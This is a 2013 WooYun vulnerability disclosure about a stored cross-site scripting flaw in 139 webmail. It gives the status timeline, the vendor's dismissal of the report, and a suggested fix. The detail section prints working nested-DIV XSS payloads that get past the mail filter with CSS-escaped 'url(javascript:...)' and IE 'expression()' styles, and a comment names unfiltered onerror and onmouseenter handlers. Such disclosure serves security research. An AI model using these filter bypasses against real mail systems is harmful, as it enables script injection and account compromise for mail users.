当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-025226

漏洞标题:139邮箱邮件正文存储型跨站漏洞

相关厂商:139移动互联

漏洞作者: Liuz5O69

提交时间:2013-06-06 11:41

修复时间:2013-06-11 11:41

公开时间:2013-06-11 11:41

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-06-06: 细节已通知厂商并且等待厂商处理中
2013-06-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

139 web 邮箱对邮件内容中嵌套的div 的样式存在过滤不严问题,导致可以实施存储型跨站攻击。

详细说明:

成功触发该漏洞可以在提交的恶意DIV之上再嵌套一个DIV,并且在第一层DIV 中要满足一定数量的代码片段被过滤,例如:
<DIV STYLE="background-image:\0075\0072\006c\0028\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028\0027\0058\0053\0053\005f\0030\0030\0027\0029\0029">
<DIV STYLE="background-image:expression((window.r==1)?'':(window.r=1,alert('OK_xSS')));">
提交之后第一层DIV里的"\"会全部被替换为空,但是第二层里的expression便不再被替换了

漏洞证明:

上述验证如图:

22.JPG


然后下面的脚本就可以在IE中触发,如图:

11.JPG


通过实验第一层background-image后的代码可以精简到5个字节左右,例如下面的也同样可以触发:
<DIV STYLE="background-image:\0075\0072\006c\0028\006a\0061">
而直接提交恶意DIV 或第一层div 任意写则不会触发该漏洞,如图:

33.JPG


expression被替换为expresionx_

修复方案:

对嵌套的div层的关键字过滤需要重新设计。

版权声明:转载请注明来源 Liuz5O69@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-06-11 11:41

厂商回复:

漏洞Rank:7 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2013-06-09 11:48 | Liuz5O69 ( 实习白帽子 | Rank:54 漏洞数:8 | 一个默默的学习者。)

    其它如<img src="" onerror 或是 onmouseenter= 都不会被过滤,其实就是第二层过滤不太严了